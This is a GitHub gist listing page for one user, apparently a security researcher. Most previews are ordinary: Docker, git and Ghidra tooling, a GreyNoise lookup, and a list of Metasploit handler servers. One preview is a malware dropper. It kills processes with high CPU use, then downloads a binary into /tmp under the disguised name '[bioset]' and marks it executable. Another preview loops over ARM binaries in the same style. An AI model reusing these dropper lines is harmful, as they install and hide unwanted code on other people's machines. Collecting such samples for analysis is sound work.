Skip to content

Instantly share code, notes, and snippets.

Remco Verhoef nl5887

Block or report user

Report or block nl5887

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
nl5887 /
Last active Sep 12, 2019
Start docker tkiv cluster
export DATADIR=$(pwd)/tkiv-data/
for s in "pd1 pd2 pd3 tikv1 tikv2 tikv3"; do
docker stop $s
docker rm $s
#ifconfig lo0 alias
#ifconfig lo0 alias
#ifconfig lo0 alias
nl5887 / precommit
Last active Aug 28, 2019
Git pre-commit script that will validate build
View precommit
set -e
DEST=$(mktemp -d)
pushd .
cd $DEST; git clone $SRC/.git . >/dev/null 2>&1
cd $SRC; git diff -P --cached | patch -p1 -d $DEST >/dev/null
nl5887 /
Created Aug 18, 2019
Docker build script that will only use git added files to container volume
DEST=$(mktemp -d)
echo "Cloning $SRC into $DEST"
pushd .
cd $DEST
git clone $SRC/.git .
nl5887 / gist:0a55e297aad9bf5f4882deb44ea0ef79
Created Mar 18, 2019
fish function to query greynoise for specific ip
View gist:0a55e297aad9bf5f4882deb44ea0ef79
function greynoise
if test (count $argv) -eq 0
echo "No arguments specified. Usage:\necho greynoise {ip}"
return 1
set ip $argv[1]
curl -s -XPOST -d "ip=$ip" ''|jq '.'
nl5887 /
Last active Apr 18, 2019
Metasploit Meterpreter handler servers (HTTP/HTTPS)

This gist contains a list of verified Metasploit Meterpreter http(s) handlers and Powershell Empire http(s) listeners.

Servers could be malicious, or just part of a red teaming action.

Thanks to and Jose.

nl5887 /
Last active Aug 6, 2019
Ghidra decompile

Ghydra decompiler

This python script communicates with the Ghydra decompiler. Currently it succeeds in communicating, sending hardcoded opcodes and returning decompiled code.

Currently working on reversing the getPcodePacked command.

Next steps:

  • implement exception handling
  • implement callbacks
  • allow decompilation of custom payloads
View all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
export PATH=`pwd`:$PATH
export PATH=/tmp:$PATH
wget -q -O \[bioset\] || curl -s -o \[bioset\]
chmod +x \[bioset\]
View a
# Edit
# Stop editing now
BINARIES="arm arm7 arm64"
for Binary in $BINARIES; do
View gist:e7b044f7d264dba7d88daed49a3c084e
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2012-2017 Matt Martz
# All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
You can’t perform that action at this time.